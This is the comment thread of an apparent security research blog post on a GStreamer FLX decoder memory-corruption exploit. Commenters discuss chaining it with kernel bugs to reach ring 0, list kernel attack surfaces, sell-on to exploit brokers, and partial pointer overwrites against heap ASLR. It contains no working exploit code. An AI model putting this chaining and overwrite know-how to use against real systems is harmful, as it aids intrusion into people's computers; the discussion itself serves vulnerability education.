No Ivan, although you could chain this exploit with a totally different one in order to get from non-executable media file to ring 0. In order to communicate directly with the GPU, you have to pass buffers via IOCTLs to /dev/dri/renderD128. You get more GPU functionality with /dev/dri/card0, but that requires CAP_SYS_ADMIN (and if you have that capability, you already can trivially get to ring 0 in most cases). You'd have to have an additional, and likely similarly complex vulnerability to exploit in the DRM engine in the kernel code responsible for parsing the data sent to it through the render node.

Of course, at the point where you're running code exec, there are so many other ways to get ring 0, so why limit yourself to DRM? You could attack vm86 on 32bit systems, or ldt_modify, or everything possible under unprivileged user namespaces, or unprivileged eBPF, or obscure network protocols... The possibilities are endless. You're not limited to using DRM. Of course, that's not to say that many graphics drivers aren't riddled with holes!

This is why blogs like this are so important. Someone could make a lot of money working full time writing exploits like these, then chaining them with kernel 0days and selling them to government contractors like Leidos or exploit brokers like Zerodium, who would then use them to get ring 0 on some poor activist's computer by sending them a .mp3 file. There are a lot more people who have these skills out there who don't educate us on vulnerabilities (or who don't do so as openly).

Well that was a bit of a digression. Anyway no, this specific approach could not get ring 0, especially not directly. You would need to chain it with a second 0day.

Anonymous said...

Wow.

Anonymous said...

Thanks for posting this!

shevairi said...

Well Done !

Anonymous said...

Hi,

Thanks for the great write-up. I have two questions. First, I don't see flxdec->name anywhere in the source; this does not seem to be a field in the GstFlxDec struct, but is referenced in your post. Am I looking at the wrong source code and/or the wrong struct?

Second, I don't understand how you can overwrite pointer addresses and still ensure they point where you want them in the presence of ASLR for heap allocations. For subsequent runs of the process, only the least-significant 12 bits of an address will remain constant, and the upper bits may all change.

For example: "FLX_LC; point flxdec->converter to offset 0x3a118. This is actually inside the flxdec object and is guaranteed to be a string of 8 zeros."

Even if I have an arbitrary write to flxdec->converter due to the bug you describe, I can overwrite the least-significant X bytes of flxdec->converter where X is an integer. Now, when I compiled the vulnerable application code, the offset between flxdec->converter and flxdec was greater than 0x0100. If it were less than 0x100, then a one byte overwrite of the least significant byte would be sufficient. But if it is more than 0x100, this is a problem because one cannot predict the upper four bits of the second-least significant byte of the address of flxdec.

I assume I am misunderstanding something, and I welcome insight. In particular, I am interpreting "FLX_LC; point flxdec->converter to offset 0x3a118" to mean that an exploit would use the FLX_LC chunk type to write over the three least significant bytes of flxdec->converter with 0x03, 0xa1, and 0x18. But perhaps this is not right?

Anonymous said...

I would like to ask some bloggers whether there is a demonstration video of operation and how to realize bit by bit offset